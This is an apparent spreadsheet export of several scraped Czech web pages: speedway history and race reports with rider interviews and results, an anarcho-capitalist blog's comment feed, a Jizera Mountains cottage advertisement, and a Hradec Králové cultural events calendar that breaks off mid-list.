čtyřutkání v jednasedmdesátém. Paradoxně na podzim v kvalifikaci spadli do nižší první ligy. Mezi elitu se vrátili až roku 1990 jako Chabařovice . Ach, Chabařovice . V současné době se zde plochodrážní pětistovky prohánějí jednou do roku díky nadšení hrstičky pořadatelů. Před půlstoletím bylo nutno areál doslova vyrvat bažinám a samotní závodníci přikládali ruku k úspěšnému dílu. „Makali jsme jako čerti,“ ví své Petr Podhola. „Z běžné práce jsme šli rovnou do práce na ploché dráze. Ani domů jsme ani nechodili. Makali jsme, pořád jsme dělali na stadiónu a neměli čas se ani svýzt na plochodrážní motorce.“ Přesto z ligy neodstoupili, byť před jejích dílem smekáme ještě dnes. „Dělali jsme si vlastní antuku,“ přibližuje jeden z budovatelů chabařovického plochodrázního areálu. „V elektrárně v Trmicích bejval kladíkovkovej mlejn. Odvezli jsme ho na stadión. Zjistili jsme, že je to vlastně šrot. Fungoval jako mlátička. Ukradli jsme cement, ale antuka byla.“ Svérázné financování fungovalo a neslo výsledky. „Z Plynáren jsme dostávali šrot,“ poskytne Petr Podhola další detaily. „Ten jsme prodali a mohli jsme si koupit díly na motorky. Taky nám dávali metyl a na rok i žuka. Jenže ta hranatá polská dodávka byla vrak. Sed‘ jsem do ní a rozjela se mi přední kola na obě strany. Naštěstí se to nestalo za jízdy.“ Všechno má svůj čas Dílo se povedlo. O tom ví každý, kdo se někdy na plochou dráhu do Chabařovic vydal. Naposledy letos v červnu. Při tradičním Memoriálu Jiřího Hurycha si organizátoři vzpomněli, že před devětačtyřiceti lety se zde závodilo poprvé. Při jednom z prvních klání, kdy startovní listinu zaplnila nejen československá, ale i polská a sovětská esa po mistrovství světa, nechyběl ani Petr Podhola. Ústecké družstvo v Polepech – zleva Jaroslav Zobal, Miloslav Čmejla, Josef Fišer, Petr Podhola a Stanislav Svoboda | foto archív Petr Podhola „Odstartoval jsem na jednoho Poláka,“ usmívá se. Oním borcem s bílou orlicí na vestě nebyl nikdo menší než Edward Jancarz a na startovním roštu s nimi stáli také Václav Verner a jeden z bratří Gordějevových. „Jel jsem jako první. Lidi se mohli zbláznit. Lek‘ jsem se a upad‘ ještě v první zatáčce.“ Léta běží, běží a nejdou zastavit. „Kdyby se to chtělo vrátit,“ zasní se muž, jehož i osmi křížkům navzdory provází vitalita, kterou postrádá i leckterý třicátník. „Nevím, co bych dělal. Asi bych byl ještě rozpustilejší.“ Petr Podhola dnes neobjíždí závod za závodem jako kdysi, ale přesto je v plochodrážních ochozech k zastižení. „Byl jsem na Zlaté přilbě v Pardubicích ,“ pochlubí se. „Byl jsem na Tomíčkově memoriálu v Praze , chodím do Chabařovic .“ Plochodrážní kariéra Petra Podholy (*15.9.1943) v kostce: 1966 ve startovní listině programu kontrolního a vyzývacího závodu v Polepech osmého května je u startovního čísla pět uvedeno: Petr Podhola, Bílina . Výsledky nejsou známé 1970 Ústí nad Labem 4. v 1. lize (detaily nejsou známé); podkomise PD ÚAMK jej uvádí jako druhého náhradníka pro první kolo národní kvalifikace se zkomoleným jménem Petr Podhoda 1971 Ústí nad Lbem 3. v extralize, z kvalifikace o extraligu 1972 se odhlásilo, detaily nejsou známé 1972 Ústí nad Labem 4. v 1.lize skupiny A (detaily nejsou známy); národní kvalifikace ČSR – Petr Podhola 16. v prvním kole v Kopřivnici 1973 Ústí nad Labem 4. v 1.lize skupiny A, postup do skupiny D, tam 4. (detaily nejsou známé); národní kvalifikace ČSR – Petr Podhola 16. v prvním kole v Čakovicích ; III: Cena Podřipska v Polepech (umístění?) 1974 Ústí nad Labem startuje v 1. lize skupiny A (detaily nejsou známé); národní kvalifikace ČSR – Petr Podhola náhradník v prvním kole v Březolupech (DNR) 1975 Chabařovice 5. v 1. lize (Petr Podhola nestartoval); semifinále MR jednotlivců – skupina B (Petr Podhola 14. jako dráhová rezerva závodu v Polepech); Pohár ČSR 7. ( Břeclav 6. Březolupy 12. Chabařovice 4., Liberec 16.); kvalifikace o MR jednotlivců 1976 – skupina A celkově? ( Chabařovice 12. Chabařovice 14., Kopřivnice ?, Březolupy?) náhradník mezinárodního závodu v červenci v Chabařovicích 1976 Chabařovice 5. v 1.lize (Petr Podhola v jediné rozjížďce 0 bodů z 95 bodů týmu celkem) Únorové setkání pod Znělcovou horou v Bílině – zleva Stanislav Svoboda, Jiří Svoboda , Jaroslav Zobal a Petr Podhola | foto Antonín Škach 27.10.2024 Kostěnice – 27. října Airbus s posádkou trénující přistání na pardubickém letišti o sobě hlukem svých motorů dával vědět dávno, než se jeho elegantní silueta vynořila z nízké oblačnosti nad kostěnickým oválkem. Vladimír Višváder ale neměl náladu dívat se nahoru po nebesích. Po dvou tréninkových kolečkách na spodní straně karteru jeho motocyklu zívala díra jako do… Jo, přesně tam. Prvotní myšlenky byl na rezignaci. Nakonec si motocykly na své jízdy v kostěnické Rozlučce vypůjčil. Na finále dal novou hranu, šel o zub dolů s převodem. Zatímco David Hofman krotil wheelie, on se ujal vedení. Celá tři kola odolával náporu pardubické juniora, ale stříbrná přilba nakonec skončila na jeho hlavě. Flat Track opanoval Milan Moravec. Ve finále ale musel čelit handicapu celého kola na objemově slabší čízu v rukou Martina Plného. Speedway: zleva David Hofman, Vladimír Višváder se synkem Teodorem a Dan Macl foto Karel Herman Málo flat trackerů Konec motoru Vladimíra Višvádera na poli u Kostěnic | foto Karel Herman Všichni účastníci rozlučkového Srandamače byli na poli v Kostěnicích dávno před oficiálním srazem stanoveným na třináctou hodinu. Na rozdíl od letní akce bylo více plochodrážníků, čtyři ohlášení flat trackeři se nakonec nedostavili. Jenže záhy začalo být všechno jinak. Milan Moravec vysvětluje, proč nastoupí v kategorii flat track: „Motor je na ucho moc hlučnej. Jel jsem na něm Mariánky, není na dlouhou, asi se to načalo.“ Flat trackeři dorazili jen dva – Martin Plný (9) a Milan Moravec (12) | foto Karel Herman Vladimír Višváder neobjel ani dvě kola a v karteru jeho motocyklu zívala obrovská díra. Trosky z jeho ojnice pobíral rukama. Myšlenky na rezignaci byly pochopitelné, ale nakonec startoval v sedlech motocyklů vypůjčených od ostatních hobíků. Milan Moravec jen kroutil hlavou nad zvuky ze svého GM. Obavy potvrdil po svém příjezdu také vyhlášený tuner Oldřich Řezníček. Ke slovu se proto dostala šestistovka Honda , s níž při mistrovském podniku ve flat tracku v Březolupech skončil ve své kategorii druhý. Dnes měl jediného soupeře. Vladimír Višváder po faktickém zániku flat trackerské kategorie Veterán nenechal svou ČZ 250 ležet ladem. Zapůjčil ji svému kamarádovi Martinu Plnému z Chrudimi . Absence kubických centimetrů v motoru ruku v ruce s menšími závodními zkušenostmi závodníka stála za předem rozhodnutými jízdami. David Hofman vodí Vladimíra Višvádera | foto Karel Herman Milan Moravec se ujímal vedení již ve chvíli, kdy mu okolo předního kola proletěla vystřelená startovací guma. Navíc nevypustil jedinou rozjížďku. Když měl Martin Plný na dohled své první body, sebral mu je předjetím o kolo vnitřní stranou závěrečné zatáčky. Finálové jízdy přinášejí skvělou tečku za povedenou akcí Účastí Vladimíra Višvádera dostal mítink plochodrážníků přece jen zvonivější náboj. Josef Štěpánek vymyslel rozpis, v němž se pětice účastníků potkala jednou s každým ze svých soupeřů a pravidelně si vystřídala vnitřní a vnější pozici na startovním roštu. Radek Chmelík (vlevo) při útoku na Dana Macla | foto Karel Herman Největším favoritem byl pochopitelně David Hofman, jediný licencovaný startující v dnešním závodě. Z vnější dráhy v rozjížďce s číslem jedna s mírně zvednutým předním kolem letěl vstříc první zatáčce. V jejím nájezdu byl dříve než Vladimír Višváder. Oba posléze bez větších potíží vyhrávali své další rozjížďky s méně zkušenými závodníky. Na jejich špici se zařadil Dan Macl. Porazil Radka Chmelíka, který jel svůj první kostěnický mítink. V tomto ohledu byl na tom stejně Miroslav Pešek . Miroslav Pešek (vlevoú v duelu s Radkem Chmelíkem | foto Karel Herman Šestačtyřicetiletý borec z nedalekého Hrochova Týnce má o poznání méně najeto. Proto se nedostal do žádné z dvojice finálových rozjížděk. A to i přesto, že Radek Chmelík v sedmé jízdě neviděl cíl. Zavřené kohoutky přívodu paliva mu umožnily ujet pouhých pár metrů. Radek Chmelík na téma svého odstoupení z rozjížďky s číslem sedm: „Někdo z pomocníků mi vypnul metyl, tak jsem ujel jen kousek.“ David Hofman ujíždí Miroslavu Peškovi | foto Karel Herman Finále plochodrážníků byla umísťovacími jízdami. V béčku musel Radek Chmelík uvést do chodu zhaslý motor. Nicméně Dan Macl, který si stoupnul na vnější pozici na startovním roštu, vypálil jako střela. Po třech kolech se radoval z triumfu i nejnižšího stupínku pódia. David Hofman se v áčku doslova nalepil na vnitřní čáru. Vladimír Višváder dal novou hranu a těžší převod. Připravil si ideální kolen na opačné straně startovního roštu. Dál to nešlo, protože zorané pole začínalo jen pár centimetrů od jeho stroje. Vtom se mihla startovací guma. Oba závodníci vypálili dopředu. Vladimír Višváder možná o zlomek vteřinky dříve. Než David Hofman zkrotil wheelie, usadil se ve vedení. Předjet ho nebylo možné. Třiapadesátiletý matador svou sbírku doplnil stříbrnou přilbou. Mezi první gratulanty se začadil i jeho dvouměsíční synáček Teodor. David Hofman dotírá na Vladimíra Višvádera | foto Karel Herman Dramatické bylo i finále flat trackerů. Milan Moravec se totiž k němu vydal s handipacem celého okruhu na Martina Plného. Poprvé jej předčil již na protilehlé rovince druhého, pro něho ale prvního kola. Byť tady v celkové klasifikaci rozhodoval součet bodů, Milan Moravec dojel jako vítěz i do finálového cíle. Martin Plného podruhé předčil spodní stranou závěrečného oblouku. Hlasy z depa Vladimír Višváder si odvezl stříbrnou přilbu | foto Karel Herman „Na tréninku se mi rozlít‘ motor,“ vyprávěl Vladimír Višváder. „Lopatkou jsme nabírali ojnici, v karteru díra. Kluci mi půjčovali motorky. Ve finále jsme dali novou hranu a převor o zub níž. Dneska se motorka musí dopasovat, jak to všichni říkaj (smích). Tak jsem odstartoval a vyhrál. Užili jsme si to, sranda mač. Kamarád Martin z Chrudimi jel flat track na mojí číze, takže paráda.“ „Dobrý jízdy,“ trošku po finálové prohře smutnil David Hofman. „Ve finále mi nevyšel start, zvedlo se mi to, druhý místo, škoda, že mi nevyšlo první místo. Děkuju za podporu Zlatý přilbě, za pomoc Oldovi Řezníčkovi, Jaroslavu Petrákovi , rodině a hlavně tátovi. A všem ostatním, co mi fandí.“ Milan Moravec vyhrál flat track | foto Karel Herman „Bylo to pěkný,“ liboval si Dan Macl. „Ve finále jsme viděli krásný boj těch prvních dvou hned od startu. Mně se jelo pěkně, srdíčko pracovalo dobře, bez závad.“ „Dobrý,“ odtušil Milan Moravec. „Ve flat tracku nikdo nebyl, kluci neodrazili. Snažil jsem se jet každou jízdu, každý kolo. Ten druhej kluk je začátečník. Měl jsem v plánu jet plošinu. Řezňa slyšel motor a řek‘, ať nejedu, ať se to nerozskočí. Svez‘ jsem se na flat tracku. Bylo to náročný na fýzu, na ruce, šest kol je znát, dráha za rok, od lajny je to tvrdý a nagumovaný. Pak je prach, kdyby ti ujelo kolo, je to v prdeli.“ Vladimír Višváder ve finále odráží jeden z útoků Davida Hofmana foto Karel Herman Speedway: TOT B A 1. Vladimír Višváder 1 2 2 2 7 1. 2. David Hofman, Pardubice 2 2 2 2 8 2. 3. Dan Macl, Úhřetická Lhota 2 1 1 2 6 1. 4. Radek Chmelík, Úhřetická Lhota 1 2 E 1 5 2. 5. Miroslav Pešek , Úhřetická Lhota 1 1 1 1 4 Flat Track: zleva Martin Plný, Milan Moravec a Oksana Pešková, která jezdila sólo jízdy s pitbikem foto Karel Herman Flat Track: FIN TOT 1. Milan Moravec Honda XL600 – FT Classic 2 2 2 2 4 12 2. Martin Plný ČZ 250 – FT Veterán F E L ex 2 2 Poznámka: Martin Plný byl ve čtvrté jízdě předjet o kolo 26.10.2024 Praha – 26. října Happy End Josefa France byl po všech stránkách podařená akce. Diváci viděli úžasné závody. Ale také osobnosti, které už nezávodí. Se svým synem se na ovále potkal také legendární Jiří Štancl . Svou éru připomněl nejen přilbou a žlutou kombinézou, ale také vítězstvím. Jako před čtyřiceti, padesáti lety. Jiří Štancl s vnukem Jackem a synem Jiřím na nástupu v Kopřivnici | foto Karel Herman Skvělá sobotní zábava V depu rozdával úsměvy na všechny strany. Neodmítnul jedinou prosbu o podpis, jedinou žádost o selfíčko. Mistr nad mistry. Přihodil i pár historek. Třeba o depu, které v Kopřivnici pamatuje na protější straně, než je dnes. Jiří Štancl na nástupu zdraví kopřivnické publikum | foto Pavel Fišer Nebo jak kdysi z nedalekého Frenštátu pod Radhoštěm dorazil Jiří Raška . Legendární skokan na lyžích označil plochodrážníky za blázny. Jiří Štancl tehdy reagoval, že od něho to doopravdy sedí, protože on sám by měl problém na skokanský můstek jen vylézt. Šlo se na nástup, kam Jiřího Štancla doprovodil nejen syn Jiří, nýbrž také vnuk Jack. Podívaná byla okázalá. Josef Franc dostával spoustu dárků. Štefan Valkovič vyhrál závod mechaniků ve výměně zadního kola. A pak se začalo závodit doopravdy. Zase jako vítěz Do startovní listiny se všichni přítomní závodníci nevešli. Někteří ani nemohli. Pouťák nepouťák, oficiální závod v gesci AČR potřebuje platnou licenci. O tom by mohl vyprávět Zdeněk Simota. Ale i pro všechny licencované borce není dost místa ve startovní listině. Řešení nabízí exhibiční rozjížďky. Jiří Štancl , stylově oblečený, v akci v Kopřivnici | foto Pavel Fišer První má obsazení jako z plochodrážních snů, které se zdávají těsně před svítáním. Josef Franc, George Štancl , Richard Wolff . A Jiří Štancl starší v sedle motocykly vypůjčeného od Milana Moravce. „Chtěl jsem si to jen objet, abych mával divákům,“ komentuje rozjížďku, kde ho po dvou kolech startmaršál Pavel Matula pozdravil šachovnicovou vlajkou jako prvního. „Ale motorka byla tak rychlá. Patnáct let na tom nesedíš. On tam měl krátkej plyn, já byl zvyklej na jawáckej dlouhej. A najednou jsem tam měl plnej plyn:ů Šťastné nejen pátky Jiří Štancl se svým synem a dárkem pro Josefa France | foto Karel Herman A jaký měl vítěz pocity? „Nemáš chrániče, náhodou upadneš…“ přemítá s úsměvem. „ Kopřivnice je velká dráha. Dobrej závodník umí zajet všude, ale když ti bude pětasedmdesát patnáct let jsi na tom neseděl, nechceš se zranit. Zaplaťpánbůh, že člověk chodí sem tam na závody.“ Sám moc dobře ví, o čem mluví. „Budu se těšit z dalších pátků,“ nežertuje. „Moje nemoc je nevyléčitelná, ale musím zaťukat, že u mě je to zatím bez následků. A tak si stavím motorky, sháním součástky od kamarádů. Mám taky zahrádku, starám se o ni, aby vypadala.“ Plochodrážní elegán Ale vidět Jiřího Štancla v akci, není rozhodně všední podívaná. V roce 2010 se objevil při anglické rozlučce svého syna, v devadesátých letech působil ve veteránských mítincích Golden Greats. U nás jel naposledy v pětaosmdesátém. Až před dvěma týdny přišla Kopřivnice . Snímeček s Jiřím Štanclem si pořídil také mechanik Jiří Georgiev a český šampión Jan Kvěch | foto Pavel Fišer „S helmou, co jsem měl, jsem vyhrál Zlatou přilbu,“ pochlubí se Jiří Štancl . „Bylo jedenáct let v Rusku se známým, co pracuje v kosmickém programu. Teď mi ji přivez‘ zpátky, i ten čumák byl originální. Kombinézu mám z Jirkova farewellu, boty svoje, rukavice taky, nebylo co řešit.“ Nebylo a tak se Jiří Štancl objevil při kopřivnickém Happy Endu. „Napadlo to našeho Jirku,“ zdůrazňuje přínos svého syna. „Domluvili se s Ríšou Wolffem, že tam pojedou. Pepe s Jirkou závodil, proto jsem tam chtěl jet. Byly to pěkný závody, dalo by se říct, že to byl mistrák.“ Jako ve skvělém filmu Pamětníci zamhouřili oči. Později narození si užívali pohled na mistra na čele jízdy, který udával tempo velké části našich plochodrážních dějin. A co na to sám Jiří Štancl ? „Páska letěla nahoru a já jel,“ usměje se a žertuje, že konečně přišel o svůj handicap. „Potom mi všichni říkali, že takovej start jsem nikdy neměl.“ Jiří Štancl míří k triumfu v exhibiční rozjížďce | foto Karel Herman 1 2 … 9 Další → NOVINKY Když už známe sestavy, položme si znovu stejnou otázku - kdo bude vítězem extraligy? Žarnovica Antonín Škach - Angličtina v České Třebové Habrmanova 1895</t>
  </si>
  <si>
    <t>52</t>
  </si>
  <si>
    <t>48</t>
  </si>
  <si>
    <t>20241101_625_3239871704_0ad3542ed07271048c4d.html</t>
  </si>
  <si>
    <t>0ad3542ed07271048c4d</t>
  </si>
  <si>
    <t>Archiv</t>
  </si>
  <si>
    <t>Archiv » poslední komentáře « Komentář 109661 Urza k Kanál Svobodného přístavu: Základy ankapu pro Paralelnou Polis Levice: V ankapu budou probíhat akce v rozporu s NAPem; stejně jako ve státech se budou porušovat centrální zákony. Tím to nepřestává být ankap/stát; samozřejmě záleží na míře, ale jasná čára tam není. Ačkoliv dokážeme rozlišovat mezi louží a jezerem, těžko […] Komentář 109660 Urza k Studio Svobodného přístavu: Právo na život: To není pravda, ve většině společností jsou nějaké drogy právě podporovány či tolerovány; akorát každá má nějakou jinou drogu, naše třeba alkohol , různé jiné mají zas další drogy (většinou psychedelika). Ano, důkazy předkládají oba; a v případě, že by […] Komentář 109659 Hrosik1 k Ať žije svoboda a kapitalismus!: definice nemuze zacinat slovy "moze byt" Komentář 109658 Hrosik1 k Kanál Svobodného přístavu: Základy ankapu pro Paralelnou Polis Levice: ano a pokud tedy rozhodnuti volnotrzniho soudu bude v rozporu s napem, tak je to jeste ankap? dite dalo informovany souhlas, ale po 5ti letech si to rozmyslelo, ale jelikoz ma podepsanou smlouvu, tak je tam drženo... video jsem videl. (klidne to muze byt […] Komentář 109657 Ňákej-pičus k Adam Smith – první „anarchokapitalista“?: 1/ to dřív lidstvo vyhyne než se poučí z nebezpečí bank. Jelikož ta banka může fungovat s tímto podvodem i několik dekád a lidé si to nebudou předávat z generace na generaci. Stejně tak jako lidé nejsou už víc jak dekádu schopní pochopit že ODS už dávno […] Komentář 109656 PavelX7 k Adam Smith – první „anarchokapitalista“?: Masturbovaní si nechte do koupelny. V tom případě je ta vaše ekonomie nepoužitelná pro lidi, protože jim dodá nějaké blbosti a ne to co jim přinese užitek. Volný trh lidi nechává o tom co jim užitek přináší rozhodovat, co je se v praxi běžně používá, […] Komentář 109654 PavelX7 k Adam Smith – první „anarchokapitalista“?: Takže výsledek je, že to vaše objektivní porovnávání je pro toho konečného příjemce služby nezásadní. Ba naprosto k prdu, protože z něj vychází nemsysly. Můžete si porovnávat co chcete ale pak závisí na konečném příjemci, subjektu, co potřebuje a […] Komentář 109652 PavelX7 k Adam Smith – první „anarchokapitalista“?: Užitek je to co z toho člověk nakonec má. Coz samozřejmě zásadní je. Nějaka masturbace nad objektivním kdovíčím je mi k prdu když pak z produktu nemám užitek. Autor: Autor: | sparesparrow || Urza</t>
  </si>
  <si>
    <t>78</t>
  </si>
  <si>
    <t>20241101_626_3239872275_1165ed6d3ee4aaad4d69.html</t>
  </si>
  <si>
    <t>1165ed6d3ee4aaad4d69</t>
  </si>
  <si>
    <t>Jizerské domky :</t>
  </si>
  <si>
    <t>Jizerské domky : Jizerské domky 01.11.2024 Znáte to. Každodenní shon, spousta nevyřízených emailů a uspěchaná doba. Říkáte si, že by to chtělo vypnout hlavu? Tak od toho jsou tu Jizerské domky – tvoje místo klidu. Vytvořené z lásky k přírodě Jizerských hor . Vychutnejte si klid domků na samotě, kde můžete obdivovat nádherné výhledy, odpočinout si v houpací síti nebo si vychutnat večeři z grilu při západu slunce. A kde budete relaxovat? Neposeda – jméno získal díky mysliveckému posedu, který se nachází hned za domkem. Když budete mít štěstí, tak se kolem domku seběhne stádo oveček nebo projde nějaká ta kráva. Pro svůj oddych se můžete zabalit do měkoučké deky anebo se koukat na hvězdy z houpací sítě. Ráno se pak brouzdat studenou rosou nebo se jít trochu prohřát do koupacího sudu s kamínky. Šmírák – to místo, kde můžete šmírovat přírodu. Skrz velké okno šmírujte pobíhající zajíce a srnky. Nebo budou šmírovat oni Vás? A když Vám z pozorování vyhládne, tak připravíte romantickou večeři na grilu s lahvinkou dobrého vína nebo si jen tak opečete buřty na ohni. Modřínek – největší z našich domků. Postavený z modřínových prken. Modřínek má jedno eso v rukávu - Farmping. To je spojení luxusního ubytování a kontaktu se zvířaty. Takže přímo u domku můžete najít ovečky Báru, Růžu nebo Dalu. Modřínek umí nabídnout i lamatreking, kdy se projdete přírodou s lamou na vodítku. Ideální zábava pro celou rodinu. Tak co? Už balíte kufry?Nebo chcete udělat radost nejen sobě, ale i svým blízkým? Darujte pobyt pod stromeček! Náš originální dřevěný poukaz určitě udělá velkou radost. Těšíme se na Vás! Používáme cookies, abychom zajistili správné fungování a bezpečnost našich stránek. Tím vám můžeme zajistit tu nejlepší zkušenost při jejich návštěvě. Pokročilá nastavení Zde můžete upravit své preference ohledně cookies. Následující kategorie můžete povolit či zakázat a svůj výběr uložit. Nezbytné krátkodobé cookies Bez nezbytných cookies se neobejde správné a bezpečné fungování našich stránek a registrační proces na nich. Funkční cookies Funkční cookies ukládají vaše preference a uzpůsobí podle nich naše stránky. Výkonnostní cookies Výkonnostní cookies monitorují výkon našich stránek. Marketingové cookies</t>
  </si>
  <si>
    <t>229</t>
  </si>
  <si>
    <t>20241101_627_3239872412_5036c7fe9d071c78feb5.html</t>
  </si>
  <si>
    <t>5036c7fe9d071c78feb5</t>
  </si>
  <si>
    <t>Kalendarium</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 23. 11. 2024 2024-11-15 00:00:00 2025-01-17 18:00:00 PREMIÉRA 2024 23.listopadu - sobota od 00:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. UNIVERZITA HRADEC KRÁLOVÉ: DNES SLAVÍ! 23.listopadu - sobota od 00:01 hodin Dovolujeme si vás pozvat na výstavu prací studentů 2. ročníku oboru Grafická a intermediální tvorba Katedry výtvarné kultury a textilní tvorby PF UHK, kteří představí výběr plakátů k oslavám 75. výročí založení Studijní a vědecké knihovny v Hradci Králové . Práce vznikly ve spolupráci se SVK HK. Práce můžete vidět v prostoru budovy už 8. 11. Výstavu najdete ve 2. NP v galerii Automat. FOTÍME EVROPU, JIŽ 20 LET! 23.listopadu - sobota od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 23.listopadu - sobota od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 23.listopadu - sobota od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 23.listopadu - sobota od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. Pohádky v AdaluVhodné pro děti od 3 let. 23.listopadu - sobota od 10:00 hodin Veselá výpravná a dětmi milovaná maňásková pohádka vypráví o tom, jak spolu pejsek a kočička hospodařili a ještě o všelijakých jiných věcech. Volně podle Josefa Čapka účinkuje Hradecké Amatérské Divadlo loutek. Představení je vhodné pro děti od tří let. * V sále je volný zasedací pořádek. * Vstupenku do sálu musí mít dětský i dospělý divák. Pokud je divákem dítě mladší dvou let, má vstup zdarma, ovšem bez nároku na místo. * Prosíme dospělé diváky, aby při výběru míst brali ohled na ty malé, kterým by případně mohli bránit ve výhledu. Děkujeme za vstřícnost a těšíme se na Vaši návštěvu! 23.listopadu - sobota od 10:00 hodin DIZAJNIŠTĚ - Krátkodobá výstava Kreativní hřiště pro malé i velké Kurátor: Tereza Vlašímská Vyrobily dílny Divadla Drak: Roman Beran, Michaela Kudelková, Hana Kopová, Layla Hruška Ottová, Štěpán Uherka Grafické úpravy: Jindřich Max Pavlíček Produkce: Barbora Kalinová, Martina Štětinová Technické řešení: Petr Seiner Světla: Libor Petr Lektorský program: Kateřina Hanková, Jana Neduha, Klára Fidlerová, Klára Svobodová Interaktivní výstava Dizajniště hravou formou seznamuje s metodou designového myšlení a krok za krokem děti naučí, jak myslet a navrhovat jako designér. Výstava provede návštěvníky cestou od designového nápadu až k jeho realizaci pomocí designového myšlení. Prostřednictvím jednoduchého návodu s pěti fázemi - empatie, definice, ideace, prototyp, testování - mohou účastníci ve své práci i každodenním životě objevovat nová kreativní řešení a zažít přitom spoustu tvůrčího dobrodružství. Designové myšlení učí kreativnímu řešení problémů, generování nápadů a schopnostem je vyhodnocovat, rozvíjí komunikační a prezentační dovednosti, podporuje práci v kolektivu, je inkluzivní, je zábavné, poučné a hravé. Pro školní kolektivy nabízíme lektorské programy, které návštěvníky provedou je celým kreativním procesem. Žáci a studenti si na nich osvojí sběr, třídění, analyzování a vyhodnocování informací a jak je mohou tvůrčím způsobem aplikovat v nových souvislostech a situacích. V pěti krocích se dostanou od nápadu k až realizaci. Účastníci přirozeně rozvinou celou řadu důležitých kompetencí: týmovou spolupráci, prezentaci, komunikaci a vizualizaci myšlenek, argumentaci, vedení diskuse i polemiky. Designové myšlení spojuje, narušuje bariéry mezi lidmi a přispívá k sebenaplnění. Lektorské programy pro školní kolektivy jsou uzpůsobeny různým věkovým kategoriím návštěvníků základních i středních škol. Autory expozice jsou designoví aktivisté, kreativci a patrioti z karlovarského spolku PROTEBE live, který již od roku 2005 buduje image Karlových Varů jako kulturního a občansky aktivního města. K tomu nemalou měrou pomáhá jejich kreativní centrum DIZAJNPARK v prostorách tuhnického výměníku. PŘÍBĚH DRAKU 1958-2018 - Stálá expozice Koncepce a libreto výstavy: Tomáš Jarkovský Návrh a realizace instalací: Tereza Vašíčková Odborná konzultace: Miloslav Klíma Spolupráce na instalaci: Dílny a technici Divadla Drak Určeno pro celou rodinu. Výstava Příběh Draku 1958–2018 vypráví příběh 60leté historie Divadla Drak. Prostřednictvím vystavených loutek, fotografií, scénografických návrhů, ukázek z inscenací a dalších dobových materiálů zachycuje proměny drakovského divadelního jazyka a zároveň přibližuje nezaměnitelnou atmosféru divadla. Představuje Drak jako místo tvorby, ale také jako křižovatku osudů těch, kteří jeho příběh po 60 let spoluvytvářeli. Expozice se skládá z 31 zastavení věnovaných významným inscenacím, osobnostem nebo událostem v historii divadla, která jsou rozdělena do osmi tematických celků. Prvních pět je řazeno chronologicky a vypraví příběh divadla od jeho počátků až k oslavám 60. výročí založení. Připomíná důležité milníky historie Draku a představuje významné inscenace či osobnosti, které jsou s jednotlivými etapami vývoje divadla spojeny. Poslední tři části-zastavení představující kompletní výpravu legendární inscenace O Sněhurce, unikátní dokument Jana Špáty a bilanci bohaté zájezdové činnosti divadla pak společně tvoří jakýsi epilog výstavy. Stručný komentář ke každému zastavení naleznete spolu s orientační mapkou v tištěném průvodci výstavou. Výstava byla realizována s finanční podporou Nadace ČEZ . MILÝ JEŽÍŠKU SWAP 23.listopadu - sobota od 10:00 hodin Poslední výměna tohoto roku se blíží! Sejdeme se těsně před adventem, abychom ještě v klídku před vypuknutím vánočního šílenství provětrali skříně a třeba se už popídili po nějakých vánočních dárcích. Protože dárek ze swapu může udělat velkou radost pod stromečkem a zároveň prospěje i naší planetě! Tak si přijďte užít předvánoční pohodu a swapí korzování, tentokrát klasicky v našem oblíbeném Artičoku. Swapovat budeme oblečení (dámské, pánské, dětské), hračky, kabelky, doplňky, obuv, domácí potřeby, knížky, nevyužité dárky apod. DOPROVODNÝ PROGRAM budeme postupně doplňovat: 10.00– 14.00: 